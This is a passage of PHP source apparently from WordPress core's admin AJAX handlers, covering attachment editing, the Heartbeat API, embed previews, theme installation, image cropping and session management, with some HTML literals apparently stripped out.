1: User's display name, 2: Date of last edit, 3: Time of last edit. */ $last_edited = sprintf( __( 'Last edited by %1$s on %2$s at %3$s' ), esc_html( $last_user->display_name ), $last_date, $last_time ); } else { /* translators: 1: Date of last edit, 2: Time of last edit. */ $last_edited = sprintf( __( 'Last edited on %1$s at %2$s' ), $last_date, $last_time ); } wp_send_json_success( array( 'last_edited' => $last_edited ) ); } /** * Handles removing a post lock via AJAX. * * @since 3.1.0 */ function wp_ajax_wp_remove_post_lock() { if ( empty( $_POST['post_ID'] ) || empty( $_POST['active_post_lock'] ) ) { wp_die( 0 ); } $post_id = (int) $_POST['post_ID']; $post = get_post( $post_id ); if ( ! $post ) { wp_die( 0 ); } check_ajax_referer( 'update-post_' . $post_id ); if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( -1 ); } $active_lock = array_map( 'absint', explode( ':', $_POST['active_post_lock'] ) ); if ( get_current_user_id() !== $active_lock[1] ) { wp_die( 0 ); } /** * Filters the post lock window duration. * * @since 3.3.0 * * @param int $interval The interval in seconds the post lock duration * should last, plus 5 seconds. Default 150. */ $new_lock = ( time() - apply_filters( 'wp_check_post_lock_window', 150 ) + 5 ) . ':' . $active_lock[1]; update_post_meta( $post_id, '_edit_lock', $new_lock, implode( ':', $active_lock ) ); wp_die( 1 ); } /** * Handles dismissing a WordPress pointer via AJAX. * * @since 3.1.0 */ function wp_ajax_dismiss_wp_pointer() { $pointer = $_POST['pointer']; if ( sanitize_key( $pointer ) !== $pointer ) { wp_die( 0 ); } // check_ajax_referer( 'dismiss-pointer_' . $pointer ); $dismissed = array_filter( explode( ',', (string) get_user_meta( get_current_user_id(), 'dismissed_wp_pointers', true ) ) ); if ( in_array( $pointer, $dismissed, true ) ) { wp_die( 0 ); } $dismissed[] = $pointer; $dismissed = implode( ',', $dismissed ); update_user_meta( get_current_user_id(), 'dismissed_wp_pointers', $dismissed ); wp_die( 1 ); } /** * Handles getting an attachment via AJAX. * * @since 3.5.0 */ function wp_ajax_get_attachment() { if ( ! isset( $_REQUEST['id'] ) ) { wp_send_json_error(); } $id = absint( $_REQUEST['id'] ); if ( ! $id ) { wp_send_json_error(); } $post = get_post( $id ); if ( ! $post ) { wp_send_json_error(); } if ( 'attachment' !== $post->post_type ) { wp_send_json_error(); } if ( ! current_user_can( 'upload_files' ) ) { wp_send_json_error(); } $attachment = wp_prepare_attachment_for_js( $id ); if ( ! $attachment ) { wp_send_json_error(); } wp_send_json_success( $attachment ); } /** * Handles querying attachments via AJAX. * * @since 3.5.0 */ function wp_ajax_query_attachments() { if ( ! current_user_can( 'upload_files' ) ) { wp_send_json_error(); } $query = isset( $_REQUEST['query'] ) ? (array) $_REQUEST['query'] : array(); $keys = array( 's', 'order', 'orderby', 'posts_per_page', 'paged', 'post_mime_type', 'post_parent', 'author', 'post__in', 'post__not_in', 'year', 'monthnum', ); foreach ( get_taxonomies_for_attachments( 'objects' ) as $t ) { if ( $t->query_var && isset( $query[ $t->query_var ] ) ) { $keys[] = $t->query_var; } } $query = array_intersect_key( $query, array_flip( $keys ) ); $query['post_type'] = 'attachment'; if ( MEDIA_TRASH && ! empty( $_REQUEST['query']['post_status'] ) && 'trash' === $_REQUEST['query']['post_status'] ) { $query['post_status'] = 'trash'; } else { $query['post_status'] = 'inherit'; } if ( current_user_can( get_post_type_object( 'attachment' )->cap->read_private_posts ) ) { $query['post_status'] .= ',private'; } // Filter query clauses to include filenames. if ( isset( $query['s'] ) ) { add_filter( 'wp_allow_query_attachment_by_filename', '__return_true' ); } /** * Filters the arguments passed to WP_Query during an Ajax * call for querying attachments. * * @since 3.7.0 * * @see WP_Query::parse_query() * * @param array $query An array of query variables. */ $query = apply_filters( 'ajax_query_attachments_args', $query ); $attachments_query = new WP_Query( $query ); update_post_parent_caches( $attachments_query->posts ); $posts = array_map( 'wp_prepare_attachment_for_js', $attachments_query->posts ); $posts = array_filter( $posts ); $total_posts = $attachments_query->found_posts; if ( $total_posts < 1 ) { // Out-of-bounds, run the query again without LIMIT for total count. unset( $query['paged'] ); $count_query = new WP_Query(); $count_query->query( $query ); $total_posts = $count_query->found_posts; } $posts_per_page = (int) $attachments_query->get( 'posts_per_page' ); $max_pages = $posts_per_page ? (int) ceil( $total_posts / $posts_per_page ) : 0; header( 'X-WP-Total: ' . (int) $total_posts ); header( 'X-WP-TotalPages: ' . $max_pages ); wp_send_json_success( $posts ); } /** * Handles updating attachment attributes via AJAX. * * @since 3.5.0 */ function wp_ajax_save_attachment() { if ( ! isset( $_REQUEST['id'] ) || ! isset( $_REQUEST['changes'] ) ) { wp_send_json_error(); } $id = absint( $_REQUEST['id'] ); if ( ! $id ) { wp_send_json_error(); } check_ajax_referer( 'update-post_' . $id, 'nonce' ); if ( ! current_user_can( 'edit_post', $id ) ) { wp_send_json_error(); } $changes = $_REQUEST['changes']; $post = get_post( $id, ARRAY_A ); if ( 'attachment' !== $post['post_type'] ) { wp_send_json_error(); } if ( isset( $changes['parent'] ) ) { $post['post_parent'] = $changes['parent']; } if ( isset( $changes['title'] ) ) { $post['post_title'] = $changes['title']; } if ( isset( $changes['caption'] ) ) { $post['post_excerpt'] = $changes['caption']; } if ( isset( $changes['description'] ) ) { $post['post_content'] = $changes['description']; } if ( MEDIA_TRASH && isset( $changes['status'] ) ) { $post['post_status'] = $changes['status']; } if ( isset( $changes['alt'] ) ) { $alt = wp_unslash( $changes['alt'] ); if ( get_post_meta( $id, '_wp_attachment_image_alt', true ) !== $alt ) { $alt = wp_strip_all_tags( $alt, true ); update_post_meta( $id, '_wp_attachment_image_alt', wp_slash( $alt ) ); } } if ( wp_attachment_is( 'audio', $post['ID'] ) ) { $changed = false; $id3data = wp_get_attachment_metadata( $post['ID'] ); if ( ! is_array( $id3data ) ) { $changed = true; $id3data = array(); } foreach ( wp_get_attachment_id3_keys( (object) $post, 'edit' ) as $key => $label ) { if ( isset( $changes[ $key ] ) ) { $changed = true; $id3data[ $key ] = sanitize_text_field( wp_unslash( $changes[ $key ] ) ); } } if ( $changed ) { wp_update_attachment_metadata( $id, $id3data ); } } if ( MEDIA_TRASH && isset( $changes['status'] ) && 'trash' === $changes['status'] ) { wp_delete_post( $id ); } else { wp_update_post( $post ); } wp_send_json_success(); } /** * Handles saving backward compatible attachment attributes via AJAX. * * @since 3.5.0 */ function wp_ajax_save_attachment_compat() { if ( ! isset( $_REQUEST['id'] ) ) { wp_send_json_error(); } $id = absint( $_REQUEST['id'] ); if ( ! $id ) { wp_send_json_error(); } if ( empty( $_REQUEST['attachments'] ) || empty( $_REQUEST['attachments'][ $id ] ) ) { wp_send_json_error(); } $attachment_data = $_REQUEST['attachments'][ $id ]; check_ajax_referer( 'update-post_' . $id, 'nonce' ); if ( ! current_user_can( 'edit_post', $id ) ) { wp_send_json_error(); } $post = get_post( $id, ARRAY_A ); if ( 'attachment' !== $post['post_type'] ) { wp_send_json_error(); } /** This filter is documented in wp-admin/includes/media.php */ $post = apply_filters( 'attachment_fields_to_save', $post, $attachment_data ); if ( isset( $post['errors'] ) ) { $errors = $post['errors']; // @todo return me and display me! unset( $post['errors'] ); } wp_update_post( $post ); foreach ( get_attachment_taxonomies( $post ) as $taxonomy ) { if ( isset( $attachment_data[ $taxonomy ] ) ) { wp_set_object_terms( $id, array_map( 'trim', preg_split( '/,+/', $attachment_data[ $taxonomy ] ) ), $taxonomy, false ); } } $attachment = wp_prepare_attachment_for_js( $id ); if ( ! $attachment ) { wp_send_json_error(); } wp_send_json_success( $attachment ); } /** * Handles saving the attachment order via AJAX. * * @since 3.5.0 */ function wp_ajax_save_attachment_order() { if ( ! isset( $_REQUEST['post_id'] ) ) { wp_send_json_error(); } $post_id = absint( $_REQUEST['post_id'] ); if ( ! $post_id ) { wp_send_json_error(); } if ( empty( $_REQUEST['attachments'] ) ) { wp_send_json_error(); } check_ajax_referer( 'update-post_' . $post_id, 'nonce' ); $attachments = $_REQUEST['attachments']; if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_send_json_error(); } foreach ( $attachments as $attachment_id => $menu_order ) { if ( ! current_user_can( 'edit_post', $attachment_id ) ) { continue; } $attachment = get_post( $attachment_id ); if ( ! $attachment ) { continue; } if ( 'attachment' !== $attachment->post_type ) { continue; } wp_update_post( array( 'ID' => $attachment_id, 'menu_order' => $menu_order, ) ); } wp_send_json_success(); } /** * Handles sending an attachment to the editor via AJAX. * * Generates the HTML to send an attachment to the editor. * Backward compatible with the {@see 'media_send_to_editor'} filter * and the chain of filters that follow. * * @since 3.5.0 */ function wp_ajax_send_attachment_to_editor() { check_ajax_referer( 'media-send-to-editor', 'nonce' ); $attachment = wp_unslash( $_POST['attachment'] ); $id = (int) $attachment['id']; $post = get_post( $id ); if ( ! $post ) { wp_send_json_error(); } if ( 'attachment' !== $post->post_type ) { wp_send_json_error(); } if ( current_user_can( 'edit_post', $id ) ) { // If this attachment is unattached, attach it. Primarily a back compat thing. $insert_into_post_id = (int) $_POST['post_id']; if ( 0 === $post->post_parent && $insert_into_post_id ) { wp_update_post( array( 'ID' => $id, 'post_parent' => $insert_into_post_id, ) ); } } $url = empty( $attachment['url'] ) ? '' : $attachment['url']; $rel = ( str_contains( $url, 'attachment_id' ) || get_attachment_link( $id ) === $url ); remove_filter( 'media_send_to_editor', 'image_media_send_to_editor' ); if ( str_starts_with( $post->post_mime_type, 'image' ) ) { $align = isset( $attachment['align'] ) ? $attachment['align'] : 'none'; $size = isset( $attachment['image-size'] ) ? $attachment['image-size'] : 'medium'; $alt = isset( $attachment['image_alt'] ) ? $attachment['image_alt'] : ''; // No whitespace-only captions. $caption = isset( $attachment['post_excerpt'] ) ? $attachment['post_excerpt'] : ''; if ( '' === trim( $caption ) ) { $caption = ''; } $title = ''; // We no longer insert title tags into tags, as they are redundant. $html = get_image_send_to_editor( $id, $caption, $title, $align, $url, $rel, $size, $alt ); } elseif ( wp_attachment_is( 'video', $post ) || wp_attachment_is( 'audio', $post ) ) { $html = stripslashes_deep( $_POST['html'] ); } else { $html = isset( $attachment['post_title'] ) ? $attachment['post_title'] : ''; $rel = $rel ? ' rel="attachment wp-att-' . $id . '"' : ''; // Hard-coded string, $id is already sanitized. if ( ! empty( $url ) ) { $html = '' . $html . ''; } } /** This filter is documented in wp-admin/includes/media.php */ $html = apply_filters( 'media_send_to_editor', $html, $id, $attachment ); wp_send_json_success( $html ); } /** * Handles sending a link to the editor via AJAX. * * Generates the HTML to send a non-image embed link to the editor. * * Backward compatible with the following filters: * - file_send_to_editor_url * - audio_send_to_editor_url * - video_send_to_editor_url * * @since 3.5.0 * * @global WP_Post $post Global post object. * @global WP_Embed $wp_embed WordPress Embed object. */ function wp_ajax_send_link_to_editor() { global $post, $wp_embed; check_ajax_referer( 'media-send-to-editor', 'nonce' ); $src = wp_unslash( $_POST['src'] ); if ( ! $src ) { wp_send_json_error(); } if ( ! strpos( $src, '://' ) ) { $src = 'http://' . $src; } $src = sanitize_url( $src ); if ( ! $src ) { wp_send_json_error(); } $link_text = trim( wp_unslash( $_POST['link_text'] ) ); if ( ! $link_text ) { $link_text = wp_basename( $src ); } $post = get_post( isset( $_POST['post_id'] ) ? $_POST['post_id'] : 0 ); // Ping WordPress for an embed. $check_embed = $wp_embed->run_shortcode( '[embed]' . $src . '[/embed]' ); // Fallback that WordPress creates when no oEmbed was found. $fallback = $wp_embed->maybe_make_link( $src ); if ( $check_embed !== $fallback ) { // TinyMCE view for [embed] will parse this. $html = '[embed]' . $src . '[/embed]'; } elseif ( $link_text ) { $html = '' . $link_text . ''; } else { $html = ''; } // Figure out what filter to run: $type = 'file'; $ext = preg_replace( '/^.+?\.([^.]+)$/', '$1', $src ); if ( $ext ) { $ext_type = wp_ext2type( $ext ); if ( 'audio' === $ext_type || 'video' === $ext_type ) { $type = $ext_type; } } /** This filter is documented in wp-admin/includes/media.php */ $html = apply_filters( "{$type}_send_to_editor_url", $html, $src, $link_text ); wp_send_json_success( $html ); } /** * Handles the Heartbeat API via AJAX. * * Runs when the user is logged in. * * @since 3.6.0 */ function wp_ajax_heartbeat() { if ( empty( $_POST['_nonce'] ) ) { wp_send_json_error(); } $response = array(); $data = array(); $nonce_state = wp_verify_nonce( $_POST['_nonce'], 'heartbeat-nonce' ); // 'screen_id' is the same as $current_screen->id and the JS global 'pagenow'. if ( ! empty( $_POST['screen_id'] ) ) { $screen_id = sanitize_key( $_POST['screen_id'] ); } else { $screen_id = 'front'; } if ( ! empty( $_POST['data'] ) ) { $data = wp_unslash( (array) $_POST['data'] ); } if ( 1 !== $nonce_state ) { /** * Filters the nonces to send to the New/Edit Post screen. * * @since 4.3.0 * * @param array $response The Heartbeat response. * @param array $data The $_POST data sent. * @param string $screen_id The screen ID. */ $response = apply_filters( 'wp_refresh_nonces', $response, $data, $screen_id ); if ( false === $nonce_state ) { // User is logged in but nonces have expired. $response['nonces_expired'] = true; wp_send_json( $response ); } } if ( ! empty( $data ) ) { /** * Filters the Heartbeat response received. * * @since 3.6.0 * * @param array $response The Heartbeat response. * @param array $data The $_POST data sent. * @param string $screen_id The screen ID. */ $response = apply_filters( 'heartbeat_received', $response, $data, $screen_id ); } /** * Filters the Heartbeat response sent. * * @since 3.6.0 * * @param array $response The Heartbeat response. * @param string $screen_id The screen ID. */ $response = apply_filters( 'heartbeat_send', $response, $screen_id ); /** * Fires when Heartbeat ticks in logged-in environments. * * Allows the transport to be easily replaced with long-polling. * * @since 3.6.0 * * @param array $response The Heartbeat response. * @param string $screen_id The screen ID. */ do_action( 'heartbeat_tick', $response, $screen_id ); // Send the current time according to the server. $response['server_time'] = time(); wp_send_json( $response ); } /** * Handles getting revision diffs via AJAX. * * @since 3.6.0 */ function wp_ajax_get_revision_diffs() { require ABSPATH . 'wp-admin/includes/revision.php'; $post = get_post( (int) $_REQUEST['post_id'] ); if ( ! $post ) { wp_send_json_error(); } if ( ! current_user_can( 'edit_post', $post->ID ) ) { wp_send_json_error(); } // Really just pre-loading the cache here. $revisions = wp_get_post_revisions( $post->ID, array( 'check_enabled' => false ) ); if ( ! $revisions ) { wp_send_json_error(); } $return = array(); // Increase the script timeout limit to allow ample time for diff UI setup. if ( function_exists( 'set_time_limit' ) ) { set_time_limit( 5 * MINUTE_IN_SECONDS ); } foreach ( $_REQUEST['compare'] as $compare_key ) { list( $compare_from, $compare_to ) = explode( ':', $compare_key ); // from:to $return[] = array( 'id' => $compare_key, 'fields' => wp_get_revision_ui_diff( $post, $compare_from, $compare_to ), ); } wp_send_json_success( $return ); } /** * Handles auto-saving the selected color scheme for * a user's own profile via AJAX. * * @since 3.8.0 * * @global array $_wp_admin_css_colors */ function wp_ajax_save_user_color_scheme() { global $_wp_admin_css_colors; check_ajax_referer( 'save-color-scheme', 'nonce' ); $color_scheme = sanitize_key( $_POST['color_scheme'] ); if ( ! isset( $_wp_admin_css_colors[ $color_scheme ] ) ) { wp_send_json_error(); } $previous_color_scheme = get_user_meta( get_current_user_id(), 'admin_color', true ); update_user_meta( get_current_user_id(), 'admin_color', $color_scheme ); wp_send_json_success( array( 'previousScheme' => 'admin-color-' . $previous_color_scheme, 'currentScheme' => 'admin-color-' . $color_scheme, ) ); } /** * Handles getting themes from themes_api() via AJAX. * * @since 3.9.0 * * @global array $themes_allowedtags * @global array $theme_field_defaults */ function wp_ajax_query_themes() { global $themes_allowedtags, $theme_field_defaults; if ( ! current_user_can( 'install_themes' ) ) { wp_send_json_error(); } $args = wp_parse_args( wp_unslash( $_REQUEST['request'] ), array( 'per_page' => 20, 'fields' => array_merge( (array) $theme_field_defaults, array( 'reviews_url' => true, // Explicitly request the reviews URL to be linked from the Add Themes screen. ) ), ) ); if ( isset( $args['browse'] ) && 'favorites' === $args['browse'] && ! isset( $args['user'] ) ) { $user = get_user_option( 'wporg_favorites' ); if ( $user ) { $args['user'] = $user; } } $old_filter = isset( $args['browse'] ) ? $args['browse'] : 'search'; /** This filter is documented in wp-admin/includes/class-wp-theme-install-list-table.php */ $args = apply_filters( 'install_themes_table_api_args_' . $old_filter, $args ); $api = themes_api( 'query_themes', $args ); if ( is_wp_error( $api ) ) { wp_send_json_error(); } $update_php = network_admin_url( 'update.php?action=install-theme' ); $installed_themes = search_theme_directories(); if ( false === $installed_themes ) { $installed_themes = array(); } foreach ( $installed_themes as $theme_slug => $theme_data ) { // Ignore child themes. if ( str_contains( $theme_slug, '/' ) ) { unset( $installed_themes[ $theme_slug ] ); } } foreach ( $api->themes as &$theme ) { $theme->install_url = add_query_arg( array( 'theme' => $theme->slug, '_wpnonce' => wp_create_nonce( 'install-theme_' . $theme->slug ), ), $update_php ); if ( current_user_can( 'switch_themes' ) ) { if ( is_multisite() ) { $theme->activate_url = add_query_arg( array( 'action' => 'enable', '_wpnonce' => wp_create_nonce( 'enable-theme_' . $theme->slug ), 'theme' => $theme->slug, ), network_admin_url( 'themes.php' ) ); } else { $theme->activate_url = add_query_arg( array( 'action' => 'activate', '_wpnonce' => wp_create_nonce( 'switch-theme_' . $theme->slug ), 'stylesheet' => $theme->slug, ), admin_url( 'themes.php' ) ); } } $is_theme_installed = array_key_exists( $theme->slug, $installed_themes ); // We only care about installed themes. $theme->block_theme = $is_theme_installed && wp_get_theme( $theme->slug )->is_block_theme(); if ( ! is_multisite() && current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) ) { $customize_url = $theme->block_theme ? admin_url( 'site-editor.php' ) : wp_customize_url( $theme->slug ); $theme->customize_url = add_query_arg( array( 'return' => urlencode( network_admin_url( 'theme-install.php', 'relative' ) ), ), $customize_url ); } $theme->name = wp_kses( $theme->name, $themes_allowedtags ); $theme->author = wp_kses( $theme->author['display_name'], $themes_allowedtags ); $theme->version = wp_kses( $theme->version, $themes_allowedtags ); $theme->description = wp_kses( $theme->description, $themes_allowedtags ); $theme->stars = wp_star_rating( array( 'rating' => $theme->rating, 'type' => 'percent', 'number' => $theme->num_ratings, 'echo' => false, ) ); $theme->num_ratings = number_format_i18n( $theme->num_ratings ); $theme->preview_url = set_url_scheme( $theme->preview_url ); $theme->compatible_wp = is_wp_version_compatible( $theme->requires ); $theme->compatible_php = is_php_version_compatible( $theme->requires_php ); } wp_send_json_success( $api ); } /** * Applies [embed] Ajax handlers to a string. * * @since 4.0.0 * * @global WP_Post $post Global post object. * @global WP_Embed $wp_embed WordPress Embed object. * @global WP_Scripts $wp_scripts * @global int $content_width */ function wp_ajax_parse_embed() { global $post, $wp_embed, $content_width; if ( empty( $_POST['shortcode'] ) ) { wp_send_json_error(); } $post_id = isset( $_POST['post_ID'] ) ? (int) $_POST['post_ID'] : 0; if ( $post_id > 0 ) { $post = get_post( $post_id ); if ( ! $post || ! current_user_can( 'edit_post', $post->ID ) ) { wp_send_json_error(); } setup_postdata( $post ); } elseif ( ! current_user_can( 'edit_posts' ) ) { // See WP_oEmbed_Controller::get_proxy_item_permissions_check(). wp_send_json_error(); } $shortcode = wp_unslash( $_POST['shortcode'] ); preg_match( '/' . get_shortcode_regex() . '/s', $shortcode, $matches ); $atts = shortcode_parse_atts( $matches[3] ); if ( ! empty( $matches[5] ) ) { $url = $matches[5]; } elseif ( ! empty( $atts['src'] ) ) { $url = $atts['src']; } else { $url = ''; } $parsed = false; $wp_embed->return_false_on_fail = true; if ( 0 === $post_id ) { /* * Refresh oEmbeds cached outside of posts that are past their TTL. * Posts are excluded because they have separate logic for refreshing * their post meta caches. See WP_Embed::cache_oembed(). */ $wp_embed->usecache = false; } if ( is_ssl() && str_starts_with( $url, 'http://' ) ) { /* * Admin is ssl and the user pasted non-ssl URL. * Check if the provider supports ssl embeds and use that for the preview. */ $ssl_shortcode = preg_replace( '%^(\\[embed[^\\]]*\\])http://%i', '$1https://', $shortcode ); $parsed = $wp_embed->run_shortcode( $ssl_shortcode ); if ( ! $parsed ) { $no_ssl_support = true; } } // Set $content_width so any embeds fit in the destination iframe. if ( isset( $_POST['maxwidth'] ) && is_numeric( $_POST['maxwidth'] ) && $_POST['maxwidth'] > 0 ) { if ( ! isset( $content_width ) ) { $content_width = (int) $_POST['maxwidth']; } else { $content_width = min( $content_width, (int) $_POST['maxwidth'] ); } } if ( $url && ! $parsed ) { $parsed = $wp_embed->run_shortcode( $shortcode ); } if ( ! $parsed ) { wp_send_json_error( array( 'type' => 'not-embeddable', /* translators: %s: URL that could not be embedded. */ 'message' => sprintf( __( '%s failed to embed.' ), '' . esc_html( $url ) . '' ), ) ); } if ( has_shortcode( $parsed, 'audio' ) || has_shortcode( $parsed, 'video' ) ) { $styles = ''; $mce_styles = wpview_media_sandbox_styles(); foreach ( $mce_styles as $style ) { $styles .= sprintf( '', $style ); } $html = do_shortcode( $parsed ); global $wp_scripts; if ( ! empty( $wp_scripts ) ) { $wp_scripts->done = array(); } ob_start(); wp_print_scripts( array( 'mediaelement-vimeo', 'wp-mediaelement' ) ); $scripts = ob_get_clean(); $parsed = $styles . $html . $scripts; } if ( ! empty( $no_ssl_support ) || ( is_ssl() && ( preg_match( '%<(iframe|script|embed) [^>]*src="http://%', $parsed ) || preg_match( '%]*href="http://%', $parsed ) ) ) ) { // Admin is ssl and the embed is not. Iframes, scripts, and other "active content" will be blocked. wp_send_json_error( array( 'type' => 'not-ssl', 'message' => __( 'This preview is unavailable in the editor.' ), ) ); } $return = array( 'body' => $parsed, 'attr' => $wp_embed->last_attr, ); if ( str_contains( $parsed, 'class="wp-embedded-content' ) ) { if ( defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ) { $script_src = includes_url( 'js/wp-embed.js' ); } else { $script_src = includes_url( 'js/wp-embed.min.js' ); } $return['head'] = ''; $return['sandbox'] = true; } wp_send_json_success( $return ); } /** * @since 4.0.0 * * @global WP_Post $post Global post object. * @global WP_Scripts $wp_scripts */ function wp_ajax_parse_media_shortcode() { global $post, $wp_scripts; if ( empty( $_POST['shortcode'] ) ) { wp_send_json_error(); } $shortcode = wp_unslash( $_POST['shortcode'] ); // Only process previews for media related shortcodes: $found_shortcodes = get_shortcode_tags_in_content( $shortcode ); $media_shortcodes = array( 'audio', 'embed', 'playlist', 'video', 'gallery', ); $other_shortcodes = array_diff( $found_shortcodes, $media_shortcodes ); if ( ! empty( $other_shortcodes ) ) { wp_send_json_error(); } if ( ! empty( $_POST['post_ID'] ) ) { $post = get_post( (int) $_POST['post_ID'] ); } // The embed shortcode requires a post. if ( ! $post || ! current_user_can( 'edit_post', $post->ID ) ) { if ( in_array( 'embed', $found_shortcodes, true ) ) { wp_send_json_error(); } } else { setup_postdata( $post ); } $parsed = do_shortcode( $shortcode ); if ( empty( $parsed ) ) { wp_send_json_error( array( 'type' => 'no-items', 'message' => __( 'No items found.' ), ) ); } $head = ''; $styles = wpview_media_sandbox_styles(); foreach ( $styles as $style ) { $head .= ''; } if ( ! empty( $wp_scripts ) ) { $wp_scripts->done = array(); } ob_start(); echo $parsed; if ( 'playlist' === $_REQUEST['type'] ) { wp_underscore_playlist_templates(); wp_print_scripts( 'wp-playlist' ); } else { wp_print_scripts( array( 'mediaelement-vimeo', 'wp-mediaelement' ) ); } wp_send_json_success( array( 'head' => $head, 'body' => ob_get_clean(), ) ); } /** * Handles destroying multiple open sessions for a user via AJAX. * * @since 4.1.0 */ function wp_ajax_destroy_sessions() { $user = get_userdata( (int) $_POST['user_id'] ); if ( $user ) { if ( ! current_user_can( 'edit_user', $user->ID ) ) { $user = false; } elseif ( ! wp_verify_nonce( $_POST['nonce'], 'update-user_' . $user->ID ) ) { $user = false; } } if ( ! $user ) { wp_send_json_error( array( 'message' => __( 'Could not log out user sessions. Please try again.' ), ) ); } $sessions = WP_Session_Tokens::get_instance( $user->ID ); if ( get_current_user_id() === $user->ID ) { $sessions->destroy_others( wp_get_session_token() ); $message = __( 'You are now logged out everywhere else.' ); } else { $sessions->destroy_all(); /* translators: %s: User's display name. */ $message = sprintf( __( '%s has been logged out.' ), $user->display_name ); } wp_send_json_success( array( 'message' => $message ) ); } /** * Handles cropping an image via AJAX. * * @since 4.3.0 */ function wp_ajax_crop_image() { $attachment_id = absint( $_POST['id'] ); check_ajax_referer( 'image_editor-' . $attachment_id, 'nonce' ); if ( empty( $attachment_id ) || ! current_user_can( 'edit_post', $attachment_id ) ) { wp_send_json_error(); } $context = str_replace( '_', '-', $_POST['context'] ); $data = array_map( 'absint', $_POST['cropDetails'] ); $cropped = wp_crop_image( $attachment_id, $data['x1'], $data['y1'], $data['width'], $data['height'], $data['dst_width'], $data['dst_height'] ); if ( ! $cropped || is_wp_error( $cropped ) ) { wp_send_json_error( array( 'message' => __( 'Image could not be processed.' ) ) ); } switch ( $context ) { case 'site-icon': require_once ABSPATH . 'wp-admin/includes/class-wp-site-icon.php'; $wp_site_icon = new WP_Site_Icon(); // Skip creating a new attachment if the attachment is a Site Icon. if ( get_post_meta( $attachment_id, '_wp_attachment_context', true ) === $context ) { // Delete the temporary cropped file, we don't need it. wp_delete_file( $cropped ); // Additional sizes in wp_prepare_attachment_for_js(). add_filter( 'image_size_names_choose', array( $wp_site_icon, 'additional_sizes' ) ); break; } /** This filter is documented in wp-admin/includes/class-custom-image-header.php */ $cropped = apply_filters( 'wp_create_file_in_uploads', $cropped, $attachment_id ); // For replication. // Copy attachment properties. $attachment = wp_copy_parent_attachment_properties( $cropped, $attachment_id, $context ); // Update the attachment. add_filter( 'intermediate_image_sizes_advanced', array( $wp_site_icon, 'additional_sizes' ) ); $attachment_id = $wp_site_icon->insert_attachment( $attachment, $cropped ); remove_filter( 'intermediate_image_sizes_advanced', array( $wp_site_icon, 'additional_sizes' ) ); // Additional sizes in wp_prepare_attachment_for_js(). add_filter( 'image_size_names_choose', array( $wp_site_icon, 'additional_sizes' ) ); break; default: /** * Fires before a cropped image is saved. * * Allows to add filters to modify the way a cropped image is saved. * * @since 4.3.0 * * @param string $context The Customizer control requesting the cropped image. * @param int $attachment_id The attachment ID of the original image. * @param string $cropped Path to the cropped image file. */ do_action( 'wp_ajax_crop_image_pre_save', $context, $attachment_id, $cropped ); /** This filter is documented in wp-admin/includes/class-custom-image-header.php */ $cropped = apply_filters( 'wp_create_file_in_uploads', $cropped, $attachment_id ); // For replication. // Copy attachment properties. $attachment = wp_copy_parent_attachment_properties( $cropped, $attachment_id, $context ); $attachment_id = wp_insert_attachment( $attachment, $cropped ); $metadata = wp_generate_attachment_metadata( $attachment_id, $cropped ); /** * Filters the cropped image attachment metadata. * * @since 4.3.0 * * @see wp_generate_attachment_metadata() * * @param array $metadata Attachment metadata. */ $metadata = apply_filters( 'wp_ajax_cropped_attachment_metadata', $metadata ); wp_update_attachment_metadata( $attachment_id, $metadata ); /** * Filters the attachment ID for a cropped image. * * @since 4.3.0 * * @param int $attachment_id The attachment ID of the cropped image. * @param string $context The Customizer control requesting the cropped image. */ $attachment_id = apply_filters( 'wp_ajax_cropped_attachment_id', $attachment_id, $context ); } wp_send_json_success( wp_prepare_attachment_for_js( $attachment_id ) ); } /** * Handles generating a password via AJAX. * * @since 4.4.0 */ function wp_ajax_generate_password() { wp_send_json_success( wp_generate_password( 24 ) ); } /** * Handles generating a password in the no-privilege context via AJAX. * * @since 5.7.0 */ function wp_ajax_nopriv_generate_password() { wp_send_json_success( wp_generate_password( 24 ) ); } /** * Handles saving the user's WordPress.org username via AJAX. * * @since 4.4.0 */ function wp_ajax_save_wporg_username() { if ( ! current_user_can( 'install_themes' ) && ! current_user_can( 'install_plugins' ) ) { wp_send_json_error(); } check_ajax_referer( 'save_wporg_username_' . get_current_user_id() ); $username = isset( $_REQUEST['username'] ) ? wp_unslash( $_REQUEST['username'] ) : false; if ( ! $username ) { wp_send_json_error(); } wp_send_json_success( update_user_meta( get_current_user_id(), 'wporg_favorites', $username ) ); } /** * Handles installing a theme via AJAX. * * @since 4.6.0 * * @see Theme_Upgrader * * @global WP_Filesystem_Base $wp_filesystem WordPress filesystem subclass. */ function wp_ajax_install_theme() { check_ajax_referer( 'updates' ); if ( empty( $_POST['slug'] ) ) { wp_send_json_error( array( 'slug' => '', 'errorCode' => 'no_theme_specified', 'errorMessage' => __( 'No theme specified.' ), ) ); } $slug = sanitize_key( wp_unslash( $_POST['slug'] ) ); $status = array( 'install' => 'theme', 'slug' => $slug, ); if ( ! current_user_can( 'install_themes' ) ) { $status['errorMessage'] = __( 'Sorry, you are not allowed to install themes on this site.' ); wp_send_json_error( $status ); } require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php'; require_once ABSPATH . 'wp-admin/includes/theme.php'; $api = themes_api( 'theme_information', array( 'slug' => $slug, 'fields' => array( 'sections' => false ), ) ); if ( is_wp_error( $api ) ) { $status['errorMessage'] = $api->get_error_message(); wp_send_json_error( $status ); } $skin = new WP_Ajax_Upgrader_Skin(); $upgrader = new Theme_Upgrader( $skin ); $result = $upgrader->install( $api->download_link ); if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) { $status['debug'] = $skin->get_upgrade_messages(); } if ( is_wp_error( $result ) ) { $status['errorCode'] = $result->get_error_code(); $status['errorMessage'] = $result->get_error_message(); wp_send_json_error( $status ); } elseif ( is_wp_error( $skin->result ) ) { $status['errorCode'] = $skin->result->get_error_code(); $status['errorMessage'] = $skin->result->get_error_message(); wp_send_json_error( $status ); } elseif ( $skin->get_errors()->has_errors() ) { $status['errorMessage'] = $skin->get_error_messages(); wp_send_json_error( $status ); } elseif ( is_null( $result ) ) { global $wp_filesystem; $status['errorCode'] = 'unable_to_connect_to_filesystem'; $status['errorMessage'] = __( 'Unable to connect to the filesystem. Please confirm your credentials.' ); // Pass through the error from WP_Filesystem if one was raised. if ( $wp_filesystem instanceof WP_Filesystem_Base && is_wp_error( $wp_filesystem->errors ) && $wp_filesystem->errors->has_errors() ) { $status['errorMessage'] = esc_html( $wp_filesystem->errors->get_error_message() ); } 